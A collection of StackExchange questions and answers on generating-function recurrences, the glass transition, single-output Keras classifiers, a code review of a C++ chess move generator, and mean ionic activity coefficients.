Question: Looking at some Generating functions of a series, I have conjectured - If $G(x) \ =\ \frac{1}{1-x^{t_1}-x^{t_2}-...-x^{t_n}}$, then the recurrence equation of the the series is - $a_n = a_{n-t_1}+a_{n-t_2}+...+a_{n-t_n}$ How can I prove or disprove this? Answer: Suppose that $$ G(x) = \sum_{n=0}^\infty g_n x^n. $$ Using the given equation (ending at $i_m$, a better choice of variables), we have $$ 1 = (1-x^{i_1}-\cdots-x^{i_m}) G(x) = \sum_{n=0}^\infty (1-x^{i_1}-\cdots-x^{i_m}) g_n x^n = \\ \sum_{n=0}^\infty g_n x^n - \sum_{n=i_1}^\infty g_{n-i_1} x^n - \cdots - \sum_{n=i_m}^\infty g_{n-i_m} x^n = \\ \sum_{n=i_m}^\infty (g_n - g_{n-i_1} - \cdots - g_{n-i_m}) x^n - H(x), $$ where $\deg H(x) < i_m$. Comparing coefficients, we find out that for $n \geq i_m$, $$ g_n = g_{n-i_1} + \cdots + g_{n-i_m}. $$ More generally, you could have allowed coefficients in front of the monomials.
{ "domain": "cs.stackexchange", "id": 10766, "tags": "combinatorics, recurrence-relation, generating-functions" }
nature of glass transition
Question: I am reading in some book: "The glass transition is similar in appearance to a second-order phase transition, but it is not a true thermodynamic phase transition. This is because the transition temperature depends on the rate at which we do the experiment." What's the matter with that rate? Is it only a question of mathematical definition of thermodynamic phase or is there any physical reason to exclude rate-dependent transitions? Answer: Thermodynamic phase transitions are defined as discontinuities in (derivatives) of the free energy. Thus, they are about differences in equilibrium properties, even though often we end up measuring a non-equilibrium property because it's easier. But nowhere in this framework does a rate-dependent, i.e. non-equilibrium, situation occur, and therefore the glass transition is not a "proper" phase transition in that sense.
{ "domain": "physics.stackexchange", "id": 2774, "tags": "thermodynamics, definition, phase-transition, amorphous-solids, glass" }
TF Keras: How to turn this probability-based classifier into single-output-neuron label-based classifier
Question: Here's a simple image classifier implemented in TensorFlow Keras (right click to open in new tab): https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/quickstart/advanced.ipynb I altered it a bit to fit with my 2-class dataset. And the output layer is: Dense(2, activation=tf.nn.softmax); The loss function and optimiser are still the same as in the example in the link above. loss_fn = tf.losses.SparseCategoricalCrossentropy(); optimizer = tf.optimizers.Adam(); I wish to turn it into a classifier with single output neuron as I have only 2 classes in dataset, and sigmoid does the 2 classes good. Tried some combinations of output activation functions + loss functions + optimisers, but the network doesn't work any more (ie. it doesn't converge). For example, this doesn't work: //output layer Dense(1, activation=tf.sigmoid); //loss and optim loss_fn = tf.losses.mse; optimizer = tf.optimizers.Adagrad(1e-1); Which combination of output activation + loss + optimiser should work for the single-output-neuron model? And generically, which loss functions and optimisers should pair well? Answer: Advice from Neil, yes, output targeting class labels is still classification. Output range is in contiguous range: This is regression For example: Linear activation, it has full numeric range of outputs. Output targeting class labels is classification: Single output neuron with sigmoid-like functions. This will classify to 2 classes, although Y data can be normalised to classify more classes. Multiple output neurons (probabilities of classes) with sigmoid-like functions (softmax is mainly used). This will classify to 2 or more classes. Multiple combinations of loss functions and optimisers can make the single-neuron output layer work, with different configs for them. Note that learning rates of different optimisers are different, some take 1e-1, some need 1e-3 for good training. For example, this combination should work: loss_fn = tf.losses.LogCosh(); optimizer = tf.optimizers.RMSprop(1e-3); From my trying out, these other combinations also work for single output neuron with my data (Adam, Adamax, Nadam, RMSprop work when learning_rate=1e-3 instead of 1e-1): Adadelta Adagrad Adam Adamax Ftrl Nadam RMSprop SGD BinaryCrossentropy Yes Yes -- -- -- -- -- Yes CategoricalCrossentropy Yes -- -- -- -- -- -- -- CategoricalHinge -- -- -- -- -- -- -- -- CosineSimilarity -- -- -- -- -- -- -- -- Hinge Yes Yes -- -- -- -- -- Yes Huber Yes Yes -- -- -- -- -- Yes LogCosh Yes Yes -- -- -- -- -- Yes Poisson Yes Yes -- -- -- -- -- Yes SquaredHinge Yes Yes -- -- -- -- -- Yes KLD: lambda a,b: KLD(a,b) MAE,MAPE,MSE,MSLE: lambda a,b: Mxxx(a,b) The above lambdas are direct functions, not classes like SGD, Adadelta, etc. SparseCategorialCrossentropy: Seems not working with single output neuron.
{ "domain": "ai.stackexchange", "id": 1416, "tags": "classification, tensorflow, keras, objective-functions, regression" }
Chess engine for C++
Question: Basic Description What is the program for? This is just a hobby project for me to improve at coding, not a serious one. What does the program do? It can take a chess position (not including variations like chess960 etc.), and generate all legal moves from it. Draw and checkmates are not added yet. File and function description main.cpp/hpp - Currently only used for testing Note The functions here are just for debugging, thus don't matter much. Any feedback on how to write better code here is still appreciated though. perft()/perftDivide() Perft test to check the move generation function. printStateTest() Only used for debugging; prints the gameState. gameState.cpp/hpp - Basic board handling gameState - Game state class. addPiece()/deletePiece()/movePieceFromPos() Pretty self-explanatory. initWithFEN() Initialize game state with FEN notation. isSameColor()/isSameType() Compare the color/type of two pieces. oppositeColor() Make the piece an opponent's piece. piece.hpp - Defines the enum value of the pieces move.cpp/hpp - Move handling pieceMove Move class. initMove() Initialize pieceMove. applyMove() Makes a move and updates the game state accordingly. cordAlgebraicToNum() Converts an algebraic coordinate to the internal numeric format. cordNumToAlgebraic() Opposite of the function above. moveToUCI() Converts a piece move to UCI format. moveGen.cpp/hpp - Move generation isInCheck() Check if the selected side is in check. Doesn't use the function below, to increase performance . generatePseudoMoves() Generate pseudo-legal moves. generateLegalMoves() Filter legal moves from the function above. generateSlidingMoves() Generate directional moves with specified depth. easyMask() Generate move mask (see below). moveCanBeMade() Testing if a move can be made without crossing the edge of the board. What do I plan to add in the future? Positional evaluation AI engine What do I wish to improve? As I plan to implement more features to the code, I'm looking for ways to improve the structure and performance of it. (e.g. Better algorithms, code style...) Any sort of help is appreciated, and thanks in advance! The Code main.cpp #include <iostream> #include <vector> #include <string> #include <map> #include "gameState.hpp" #include "pieces.hpp" #include "move.hpp" #include "moveGen.hpp" #include "main.hpp" std::map<std::string, int> perftDivide (gameState currentState, int depth) { std::map<std::string, int> output; int sideToMove = currentState.whiteToMove ? COLOR_WHITE : COLOR_BLACK; std::vector<pieceMove> moveList = generateLegalMoves(currentState, sideToMove); for (int i = 0; i < moveList.size(); ++i) { output[moveToUCI(moveList[i])] = perft(applyMove(currentState, moveList[i]), depth - 1); } return output; } int perft (gameState currentState, int depth) { int sideToMove = currentState.whiteToMove ? COLOR_WHITE : COLOR_BLACK; std::vector<pieceMove> moveList = generateLegalMoves(currentState, sideToMove); int positionNum = 0; if (depth == 0) { return 1; } if (depth == 1) { return moveList.size(); } for (int i = 0; i < moveList.size(); ++i) { positionNum += perft(applyMove(currentState, moveList[i]), depth - 1); } return positionNum; } void printStateTest(gameState test) { //Temp function for printing class gameState std::map<int, char> pieces = { {9, 'P'}, {10, 'N'}, {11,'B'}, {12, 'R'}, {13, 'Q'}, {14, 'K'}, {17, 'p'}, {18, 'n'}, {19,'b'}, {20, 'r'}, {21, 'q'}, {22, 'k'} }; int temp; std::cout << "Board:\n"; for (int i = 7; i >= 0; --i) { for (int j = 0; j < 8; ++j) { temp = test.board[i * 8 + j]; if (temp != 0) { std::cout << pieces[temp]; } else { std::cout << "."; } } std::cout << std::endl; } std::cout << "White To Move: " << (test.whiteToMove == 1) << "\n"; std::cout << "Castling Right: {"; for (int i = 0; i < 4; ++ i) { std::cout << test.castlingRights[i] << " "; } std::cout << "}" << std::endl; std::cout << "En Passant: " << test.enPassant << "\n"; std::cout << "Move Clock: " << test.moveClock << "\n"; std::cout << "Moves: " << test.wholeTurn << "\n"; } int main() { //Example usage gameState test = initWithFEN("rnbq1k1r/pp1Pbppp/2p5/8/2B5/8/PPP1NnPP/RNBQK2R w KQ - 1 8"); printStateTest(test); std::cout << "Position " << perft(test, 4) << "\n"; return 0; } main.hpp #ifndef main_h #define main_h #include "gameState.hpp" int perft (gameState currentState, int depth); std::map<std::string, int> perftDivide (gameState currentState, int depth); void printStateTest(gameState test); #endif /* main_h */ gameState.cpp #include <string> #include "gameState.hpp" #include "pieces.hpp" #include "move.hpp" std::map<char, int>charToPiece = { {'P', TYPE_PAWN}, {'N', TYPE_KNIGHT}, {'B', TYPE_BISHOP}, {'R', TYPE_ROOK}, {'Q', TYPE_QUEEN}, {'K', TYPE_KING}, }; bool isSameColor (int original, int reference) { return (original & 24) == (reference & 24); } bool isSameType (int original, int reference) { return (original & 7) == (reference & 7); } int oppsiteColor (int original) { int output; switch (original & 24) { case 8: output = (original & 7) | 16; break; case 16: output = (original & 7) | 8; break; default: output = original; } return output; } gameState addPiece (gameState currentState, int pieceType, int position) { gameState newState = currentState; newState.board[position] = pieceType; return newState; } gameState deletePiece (gameState currentState, int position) { gameState newState = currentState; newState.board[position] = 0; return newState; } gameState movePieceFromPos (gameState currentState, int startPos, int endPos) { gameState newState = currentState; newState = addPiece(newState, newState.board[startPos], endPos); newState = deletePiece(newState, startPos); return newState; } gameState initWithFEN (std::string FEN) { gameState newState; std::vector<std::string> parts(6); //Seperate different parts int temp = 0; for (int i = 0; i < FEN.size(); ++i) { if (FEN[i] == ' ') { ++temp; } else { parts[temp] += FEN[i]; } } //Setting up the board int rank = 7, file = 0, piece; std::string boardFEN = parts[0]; char current; for (int i = 0; i < boardFEN.size(); ++i) { current = boardFEN[i]; if (current == '/') { file = 0; --rank; } else { if (isdigit(current)) { file += current - '0'; } else { piece = charToPiece[toupper(current)]; piece += isupper(current) ? COLOR_WHITE : COLOR_BLACK; newState.board[rank * 8 + file] = piece; ++file; } } } //Side to move newState.whiteToMove = (parts[1] == "w"); //Castling rights for (int i = 0; i < parts[2].size(); ++i) { if (parts[2][i] == 'K') { newState.castlingRights[0] = true; } if (parts[2][i] == 'Q') { newState.castlingRights[1] = true; } if (parts[2][i] == 'k') { newState.castlingRights[2] = true; } if (parts[2][i] == 'q') { newState.castlingRights[3] = true; } } //En passant if (parts[3] == "-") { newState.enPassant = -1; } else { newState.enPassant = cordAlgebraicToNum(parts[3]); } //Half move clock newState.moveClock = std::stoi(parts[4]); //Whole moves newState.wholeTurn = std::stoi(parts[5]); return newState; } #include "gameState.hpp" gameState.hpp #ifndef gameState_hpp #define gameState_hpp #include <stdio.h> #include <vector> #include <string> class gameState { public: std::vector<int> board = std::vector<int>(64); std::vector<bool> castlingRights = std::vector<bool>(4); bool whiteToMove; int enPassant, wholeTurn, moveClock; }; bool isSameColor (int original, int reference); bool isSameType (int original, int reference); int oppsiteColor (int original); gameState addPiece (gameState currentState, int pieceType, int position); gameState deletePiece (gameState currentState, int position); gameState movePieceFromPos (gameState currentState, int startPos, int endPos); gameState initWithFEN (std::string FEN); #endif /* gameState_hpp */ piece.hpp #ifndef pieces_hpp #define pieces_hpp #include <stdio.h> #include <string> #include <map> enum pieceType { //EMPTY = 0, TYPE_PAWN = 1, TYPE_KNIGHT = 2, TYPE_BISHOP = 3, TYPE_ROOK = 4, TYPE_QUEEN = 5, TYPE_KING = 6 }; enum pieceColor { COLOR_WHITE = 8, COLOR_BLACK = 16, COLOR_ANY = 24 }; #endif /* pieces_hpp */ move.cpp #include "move.hpp" #include "gameState.hpp" #include "pieces.hpp" pieceMove initMove (int start, int end, int flag) { pieceMove output; output.startSqr = start; output.endSqr = end; output.flag = flag; return output; } gameState applyMove (gameState currentState, pieceMove move) { //Make move gameState newState; newState = movePieceFromPos(currentState, move.startSqr, move.endSqr); newState.whiteToMove ^= 1; if (newState.whiteToMove) { ++newState.wholeTurn; } if (isSameType(newState.board[move.startSqr], TYPE_PAWN) || newState.board[move.endSqr] != 0) { newState.moveClock = 0; } else { ++newState.moveClock; } int castlingSide, isKingSide; for (int i = 0; i < 8; i += 7) { for (int j = 0; j < 8; j += 7) { if (move.startSqr == (i * 8 + j) || move.endSqr == (i * 8 + j)) { castlingSide = i == 0 ? 0 : 2; isKingSide = j == 0; newState.castlingRights[castlingSide | isKingSide] = false; } } if (move.startSqr == (i * 8 + 4) || move.endSqr == (i * 8 + 4)) { castlingSide = i == 0 ? 0 : 2; newState.castlingRights[castlingSide] = false; newState.castlingRights[castlingSide + 1] = false; } } switch (move.flag) { case FLAG_DOUBLE_JUMP: { newState.enPassant = move.endSqr; break; } case FLAG_EN_PASSANT: { newState.board[newState.enPassant] = 0; newState.enPassant = -1; break; } case FLAG_CASTLE: { int rookStartPosition = (move.startSqr - move.endSqr == 2) ? move.startSqr - 4 : move.startSqr + 3; int rookEndPosition = (move.startSqr - move.endSqr == 2) ? move.startSqr - 1 : move.startSqr + 1; newState = movePieceFromPos(newState, rookStartPosition, rookEndPosition); break; } case FLAG_PROMOTE_KNIGHT: { newState.board[move.endSqr] = (newState.board[move.endSqr] & 24) | TYPE_KNIGHT; break; } case FLAG_PROMOTE_BISHOP: { newState.board[move.endSqr] = (newState.board[move.endSqr] & 24) | TYPE_BISHOP; break; } case FLAG_PROMOTE_ROOK: { newState.board[move.endSqr] = (newState.board[move.endSqr] & 24) | TYPE_ROOK; break; } case FLAG_PROMOTE_QUEEN: { newState.board[move.endSqr] = (newState.board[move.endSqr] & 24) | TYPE_QUEEN; break; } } if (move.flag != FLAG_DOUBLE_JUMP) { newState.enPassant = -1; } return newState; } int cordAlgebraicToNum (std::string cordinate) { return (cordinate[0] - 'a') + (cordinate[1] - '1') * 8; } std::string cordNumToAlgebraic (int cordinate) { char rank = '1' + cordinate / 8; char file = (cordinate % 8) + ((int) 'a'); return std::string() + file + rank; } std::string moveToUCI (pieceMove move) { std::string output; output = cordNumToAlgebraic(move.startSqr) + cordNumToAlgebraic(move.endSqr); switch (move.flag) { case FLAG_PROMOTE_KNIGHT: { output += "n"; break; } case FLAG_PROMOTE_BISHOP: { output += "b"; break; } case FLAG_PROMOTE_ROOK: { output += "r"; break; } case FLAG_PROMOTE_QUEEN: { output += "q"; break; } } return output; } move.hpp #ifndef move_hpp #define move_hpp #include <stdio.h> #include "gameState.hpp" class pieceMove { public: int startSqr; int endSqr; int flag; }; enum moveFlag { FLAG_NONE = 0, FLAG_DOUBLE_JUMP = 1, FLAG_EN_PASSANT = 2, FLAG_CASTLE = 3, FLAG_PROMOTE_KNIGHT = 4, FLAG_PROMOTE_BISHOP = 5, FLAG_PROMOTE_ROOK = 6, FLAG_PROMOTE_QUEEN = 7 }; pieceMove initMove (int start, int end, int flag); gameState applyMove (gameState currentState, pieceMove move); int cordAlgebraicToNum (std::string cordinate); std::string cordNumToAlgebraic (int cordinate); std::string moveToUCI (pieceMove move); #endif /* move_hpp */ moveGen.cpp #include "moveGen.hpp" #include "move.hpp" #include "gameState.hpp" #include "pieces.hpp" #include <vector> #include <iostream> #include <math.h> bool isInCheck (gameState currentState, int side) { int kingPosition = 0; for (int i = 0; i < 64; ++i) { if (currentState.board[i] == (side | TYPE_KING)) { kingPosition = i; break; } } //Pawn attacks int opponentDirection; opponentDirection = side == COLOR_WHITE ? 8 : -8; for (int i = -1; i < 2; i += 2) { if (moveCanBeMade(kingPosition, opponentDirection + i) && currentState.board[kingPosition + i + opponentDirection] == oppsiteColor(side | TYPE_PAWN)) { return true; } } //Knight attacks std::vector<int> directions = {-17, -15, -10, -6, 6, 10, 15, 17}; int destination; for (int i = 0; i < directions.size(); ++i) { if (moveCanBeMade(kingPosition, directions[i])) { destination = kingPosition + directions[i]; if (currentState.board[destination] == oppsiteColor(side | TYPE_KNIGHT)) { return true; } } } //King opposition directions = {-9, -8, -7, -1, 1, 7, 8, 9}; for (int i = 0; i < directions.size(); ++i) { if (moveCanBeMade(kingPosition, directions[i])) { destination = kingPosition + directions[i]; if (currentState.board[destination] == oppsiteColor(side | TYPE_KING)) { return true; } } } //Rook and (non-diaganol) Queen attacks directions = {-8, -1, 1, 8}; for (int i = 0; i < directions.size(); ++i) { destination = kingPosition; for (int j = 0; j < 7; ++j) { //Can't move past the edge if (!moveCanBeMade(destination, directions[i])) { break; } destination += directions[i]; //Found an attack piece if ((currentState.board[destination] == oppsiteColor(side | TYPE_ROOK)) || (currentState.board[destination] == oppsiteColor(side | TYPE_QUEEN))) { return true; } //Obstructed by piece if (currentState.board[destination]) { break; } } } //Bishop and (diaganol) Queen attacks directions = {-9, -7, 7, 9}; for (int i = 0; i < directions.size(); ++i) { destination = kingPosition; for (int j = 0; j < 7; ++j) { //Can't move past the edge if (!moveCanBeMade(destination, directions[i])) { break; } destination += directions[i]; //Found an attack piece if ((currentState.board[destination] == oppsiteColor(side | TYPE_BISHOP)) || (currentState.board[destination] == oppsiteColor(side | TYPE_QUEEN))) { return true; } //Obstructed by piece if (currentState.board[destination]) { break; } } } return false; } std::vector<pieceMove> generatePseudoMoves (gameState currentState, int sideToMove) { int piece, type; pieceMove move; std::vector<pieceMove> pseudoMoves; for (int i = 0; i < 64; ++i) { piece = currentState.board[i]; if (isSameColor(piece, sideToMove)) { type = piece & 7; move.startSqr = i; switch (type) { case TYPE_PAWN: { bool isWhite = isSameColor(piece, COLOR_WHITE); int startingRank = isWhite ? 1 : 6; int promotionRank = isWhite ? 7 : 0; int forwardDirection = isWhite ? 8 : -8; //Forward move if (currentState.board[i + forwardDirection] == 0 && moveCanBeMade(i, forwardDirection)) { if ((i + forwardDirection) / 8 != promotionRank) { pseudoMoves.push_back(initMove(i, i + forwardDirection, FLAG_NONE)); } else { //Promotion pseudoMoves.push_back(initMove(i, i + forwardDirection, FLAG_PROMOTE_KNIGHT)); pseudoMoves.push_back(initMove(i, i + forwardDirection, FLAG_PROMOTE_BISHOP)); pseudoMoves.push_back(initMove(i, i + forwardDirection, FLAG_PROMOTE_ROOK)); pseudoMoves.push_back(initMove(i, i + forwardDirection, FLAG_PROMOTE_QUEEN)); } //Double jump if (currentState.board[i + forwardDirection * 2] == 0 && (i / 8) == startingRank) { pseudoMoves.push_back(initMove(i, i + forwardDirection * 2, FLAG_DOUBLE_JUMP)); } } //Diagonal capture int neighbor; for (int j = -1; j < 2; j += 2) { neighbor = i + j; //Normal capture if (moveCanBeMade(i, j + forwardDirection) && isSameColor(currentState.board[i], oppsiteColor(currentState.board[neighbor + forwardDirection]))) { if ((i + forwardDirection) / 8 != promotionRank) { pseudoMoves.push_back(initMove(i, neighbor + forwardDirection, FLAG_NONE)); } else { //Promotion pseudoMoves.push_back(initMove(i, neighbor + forwardDirection, FLAG_PROMOTE_KNIGHT)); pseudoMoves.push_back(initMove(i, neighbor + forwardDirection, FLAG_PROMOTE_BISHOP)); pseudoMoves.push_back(initMove(i, neighbor + forwardDirection, FLAG_PROMOTE_ROOK)); pseudoMoves.push_back(initMove(i, neighbor + forwardDirection, FLAG_PROMOTE_QUEEN)); } } //En passant if (moveCanBeMade(i, j + forwardDirection) && isSameColor(currentState.board[i], oppsiteColor(currentState.board[neighbor])) && currentState.enPassant == neighbor) { pseudoMoves.push_back(initMove(i, neighbor + forwardDirection, FLAG_EN_PASSANT)); } } break; } case TYPE_KNIGHT: { std::vector<pieceMove> moveList = generateSlidingMoves(currentState, i, {-17, -15, -10, -6, 6, 10, 15, 17}, 1); pseudoMoves.insert(std::end(pseudoMoves), std::begin(moveList), std::end(moveList)); break; } case TYPE_BISHOP: { std::vector<pieceMove> moveList = generateSlidingMoves(currentState, i, {-9, -7, 7, 9}, 7); pseudoMoves.insert(std::end(pseudoMoves), std::begin(moveList), std::end(moveList)); break; } case TYPE_ROOK: { std::vector<pieceMove> moveList = generateSlidingMoves(currentState, i, {-8, -1, 1, 8}, 7); pseudoMoves.insert(std::end(pseudoMoves), std::begin(moveList), std::end(moveList)); break; } case TYPE_QUEEN: { std::vector<pieceMove> moveList = generateSlidingMoves(currentState, i, {-9, -8, -7, -1, 1, 7, 8, 9}, 7); pseudoMoves.insert(std::end(pseudoMoves), std::begin(moveList), std::end(moveList)); break; } case TYPE_KING: { std::vector<pieceMove> moveList = generateSlidingMoves(currentState, i, {-9, -8, -7, -1, 1, 7, 8, 9}, 1); pseudoMoves.insert(std::end(pseudoMoves), std::begin(moveList), std::end(moveList)); int castlingRightsStart = sideToMove == COLOR_WHITE ? 0 : 2; //Kingside castle if (currentState.castlingRights[castlingRightsStart]) { if (!(currentState.board[i + 1] | currentState.board[i + 2]) && !(isInCheck(currentState, sideToMove) || isInCheck(movePieceFromPos(currentState, i, i + 1), sideToMove))) { pseudoMoves.push_back(initMove(i, i + 2, FLAG_CASTLE)); } } //Queenside castle if (currentState.castlingRights[castlingRightsStart + 1]) { if (!(currentState.board[i - 1] | currentState.board[i - 2] | currentState.board[i - 3]) && !(isInCheck(currentState, sideToMove) || isInCheck(movePieceFromPos(currentState, i, i - 1), sideToMove))) { pseudoMoves.push_back(initMove(i, i - 2, FLAG_CASTLE)); } } break; } } } } return pseudoMoves; } std::vector<pieceMove> generateLegalMoves (gameState currentState, int sideToMove) { std::vector<pieceMove> moveList, legalMoves, pseudoMoves = generatePseudoMoves(currentState, sideToMove); for (int i = 0; i < pseudoMoves.size(); ++i) { if (!isInCheck(applyMove(currentState, pseudoMoves[i]), sideToMove)) { legalMoves.push_back(pseudoMoves[i]); } } return legalMoves; } std::vector<pieceMove> generateSlidingMoves (gameState currentState, int square, std::vector<int> directions, int maxDepth) { //Move generation for Knights, Rooks, Queens and Kings std::vector<pieceMove> possibleMoves; pieceMove move; int destination; for (int i = 0; i < directions.size(); ++i) { destination = square; for (int j = 0; j < maxDepth; ++j) { //Can't move pass the edge if (!moveCanBeMade(destination, directions[i])) { break; } destination += directions[i]; //Can't capture own piece if (isSameColor(currentState.board[square], currentState.board[destination])) { break; } move.endSqr = destination; possibleMoves.push_back(initMove(square, destination, FLAG_NONE)); //Can't move past captured pieces if (isSameColor(currentState.board[square], oppsiteColor(currentState.board[destination]))) { break; } } } return possibleMoves; } long long int easyMask (int direction) { //Prevent moving past the edge long long int mask = 0; int vertical, horizontal; vertical = (int) lround((float) direction / 8); horizontal = direction - vertical * 8; if (horizontal != 0) { if (horizontal > 0) { for (int i = 0; i < horizontal; ++i) { mask = mask | ( 0x101010101010101 << (7 - i)); } } else { for (int i = 0; i < (~horizontal + 1); ++i) { mask = mask | ( 0x101010101010101 << i); } } } if (vertical != 0) { if (vertical > 0) { for (int i = 0; i < vertical; ++i) { mask = mask | ( 0xff00000000000000 >> (i * 8)); } } else { for (int i = 0; i < (~vertical + 1); ++i) { mask = mask | ( 0xff << (i * 8)); } } } return mask; } bool moveCanBeMade (int square, int direction) { return !((easyMask(direction) >> square) & 1); } moveGen.hpp #ifndef moveGen_hpp #define moveGen_hpp #include <stdio.h> #include <vector> #include "move.hpp" #include "gameState.hpp" bool isInCheck (gameState currentState, int side); std::vector<pieceMove> generateSlidingMoves (gameState currentState, int square, std::vector<int> directions, int maxDepth); std::vector<pieceMove> generatePseudoMoves (gameState currentState, int sideToMove); std::vector<pieceMove> generateLegalMoves (gameState currentState, int sideToMove); long long int easyMask (int direction); bool moveCanBeMade (int square, int direction); #endif /* moveGen_hpp */ Answer: std::map<std::string, int> perftDivide (gameState currentState, int depth) { std::map<std::string, int> output; First thing I notice: name your types. You have a map as the result, and a local variable with the same kind of map ... are these the same kind of thing, or do they just coincidentally use the same data structure? And what is it? int sideToMove = currentState.whiteToMove ? COLOR_WHITE : COLOR_BLACK; Make that const. It doesn't change after you figure it out once. std::vector<pieceMove> moveList = generateLegalMoves(currentState, sideToMove); Use auto. And why is sideToMove an integer rather than an enumeration type? for (int i = 0; i < moveList.size(); ++i) { output[moveToUCI(moveList[i])] = perft(applyMove(currentState, moveList[i]), depth - 1); } You're going through the entire container in order, so use the range-based for loop: for (auto& mv : moveList) output[moveToUCI(mv)] = perft(applyMove(currentState,mv), depth-1); and that also takes care of the nit that you repeated moveList[i]. This is not a big deal for a vector, but more generally looking things up can be expensive. Don't do the same work multiple times in the same line! As for whether mvshould be const as well, I can't tell just from looking here. Think about it. Add const throughout the code. You are passing gamestate by value. This deep copies the two vectors it contains, you know. That function doesn't appear to modify the gamestate in-place. So why are you passing it around by value everywhere? std::map<char, int>charToPiece = { {'P', TYPE_PAWN}, {'N', TYPE_KNIGHT}, {'B', TYPE_BISHOP}, {'R', TYPE_ROOK}, {'Q', TYPE_QUEEN}, {'K', TYPE_KING}, }; This is a global variable, not static and not inside a namespace. You should be careful what global names you make, as this will become a problem when you combine libraries and other code. I expect this is a fixed lookup table? Why isn't it const or better yet constexpr if your version of the compiler handles that. But still, for this use, that is a very expensive way to do it. This is better implemented as a function containing a switch statement. And, why is the map using int instead of the enumeration type? class gameState { public: std::vector<int> board = std::vector<int>(64); std::vector<bool> castlingRights = std::vector<bool>(4); bool whiteToMove; int enPassant, wholeTurn, moveClock; }; Those vectors are initialized to specific sizes... are they actually fixed size? Consider using an array instead of a vector if they will never change size! Note also that std::vector<bool> is weird. This may or may not bother you in this application. pieceMove initMove (int start, int end, int flag) { pieceMove output; output.startSqr = start; output.endSqr = end; output.flag = flag; return output; } I think you meant to write a constructor. Even your comment calls this "initialize pieceMove". I see you wrote pieceMove as a class with all public data members and no functions, so it's just a plain struct. But maybe it should have member functions... you're just not using them right. gameState initWithFEN (std::string FEN) { Again, it appears that this should actually be a constructor for gameState. You are passing in FEN by value. Do you actually need to make a local copy of the string? Normally you should pass these as const&, but it's even better to use std::string_view. //Castling rights for (int i = 0; i < parts[2].size(); ++i) { if (parts[2][i] == 'K') { newState.castlingRights[0] = true; } if (parts[2][i] == 'Q') { newState.castlingRights[1] = true; } if (parts[2][i] == 'k') { newState.castlingRights[2] = true; } if (parts[2][i] == 'q') { newState.castlingRights[3] = true; } } Don't repeat blocks of code that only have one little thing like a single variable that's different between the copies. Copy/paste is not your friend. You're also repeating the indexinging of parts[2]. All your commented sections in this long function should really be separate functions. Functions should be cohesive and do one thing. To eliminate the duplicated statement, do the mapping of the letter to the index as a distinct step: for (const auto L : parts[2]) { newState[castlingRights[castle_index(part)]=true; } long long int is compiler-specific as to how many bits it has. I think you are counting on it being a specific size. Also, you probably meant to be unsigned as you need the top bit for your bit flags as well. So use std::uint64_t. Summary of issues to work on Break up meandering functions into their individual helper functions. Declare names for various types you use like the map. Don't pass by value for non-simple types, most of the time. Use the enumeration types you created. They are types, not just handy way to declare some constant ints. Use classes properly: data members private, functions that work on them are member functions. Use the special member functions for their proper role; i.e. constructors. use const use range-based for loop when you can. Don't repeat code multiple times with only a single symbol changed between them.
{ "domain": "codereview.stackexchange", "id": 41507, "tags": "c++, performance, chess" }
How is the formula of mean activity coefficient derived?
Question: The mean activity coefficient is defiend as follows: $$\gamma_\pm = (\gamma_+\gamma_-)^{1/2}.\tag{1}$$ If Debye-Hückel equation $$-\log\gamma_i = 0.5z_i^2\mu^{1/2}\tag{2}$$ is used, then the mean activity coefficient has the form $$-\log\gamma_\pm = 0.5|z_+z_-|\mu^{1/2},\label{eqn:3}\tag{3}$$ where $\mu$ is the ionic strength, $z_i$ is the charge of species $i,$ $\gamma_i$ is the activity coefficient. But I'm confused about the equation \eqref{eqn:3}. It can be found as equation \eqref{eqn:3-38} in Snoeyink and Jenkins' Water Chemistry [1]: […] developed for ionic strengths of less than approximately $\pu{5E-3}$ and can be stated as $$-\log\gamma_i = 0.5Z_i^2\mu^{1/2}.\tag{3-34}$$ Because anions cannot be added to a solution without an equivalent number of cations (and vice versa). it is impossible to determine experimentally the activity coefficient of a single ion. Therefore, Eqs. 3-34, 3-35, and 3-36 cannot be verified directly. However, it is possible to define, and measure experimentally, a mean activity coefficient, $\gamma_\pm,$ as, $$\gamma_\pm = (\gamma_+\gamma_-)^{1/2}.\tag{3-37}$$ The Debye-Hückel and Güntelberg relationships can be extended to the mean activity coefficient thus: $$-\log\gamma_\pm = 0.5|Z_+Z_-|\mu^{1/2},\label{eqn:3-38}\tag{3-38}$$ Below is my derivation process: $$ \begin{align} -\log\gamma_+ &= 0.5z_+^2\mu^{1/2};\tag{4.1}\\ -\log\gamma_- &= 0.5z_-^2\mu^{1/2},\tag{4.2} \end{align} $$ so $$ \begin{align} -\log\gamma_\pm &= -\log[10^{-0.5z_+^2\mu^{1/2}}\times 10^{-0.5z_-^2\mu^{1/2}}]^{1/2} \tag{5.1}\\ & = -\log[10^{-0.5\mu^{1/2}(z_+^2+z_-^2)}]^{1/2} \tag{5.2}\\ & = 0.25\mu^{1/2}(z_+^2+z_-^2). \tag{5.3} \end{align} $$ This result is different from $0.5|z_+z_-|\mu^{1/2}.$ Can someone tell me which step is wrong in my process? Reference Snoeyink, V. L.; Jenkins, D. Water Chemistry; Wiley: New York, 1980. ISBN 978-0-471-05196-1. Answer: The problem is you were starting with an expression for the mean activity coefficient for salts where both the cation and anion were monovalent, and then attempting to derive, from this, a general expression for salts of all empirical formulas. To correct this, you need to start with the general expression for the mean activity coefficient of salts of any emprical formula. If the empirical formula of the salt is of the form $\ce{A_pB_q}$, where A is the cation and B is the anion, then the general formula for the mean activity coefficient is: $$\gamma_{\pm} = \sqrt[^{p+q}]{\gamma^p_+\gamma^q_-}$$ [Adapted from: https://en.wikipedia.org/wiki/Activity_coefficient, where I've taken the Wikipedia expression and substituted $\gamma_+$ for $\gamma_A$, and $\gamma_-$ for $\gamma_B$, to correspond to the nomenclature you are using.] Charge balance dictates that $|z_+| = q$ and $|z_-| = p$. [E.g., in $\ce{A_2B_3}$, the charge on A must be 3+, and that on B must be 2- (or some integer multiple of those).] Substituting, we have: $$\gamma_{\pm} = \sqrt[^{|z_-|+|z_+|}]{\gamma^{|z_-|}_+\gamma^{|z_+|}_-}$$ If you use that in place of eqn. (3-37) in your post, and work through your calculations again, you will get the result show in eqn. (3-38), which is a general result for any values of p and q.
{ "domain": "chemistry.stackexchange", "id": 14257, "tags": "physical-chemistry, electrochemistry, equilibrium, solutions" }
Could standard model quarks be arranged into different number of generations?
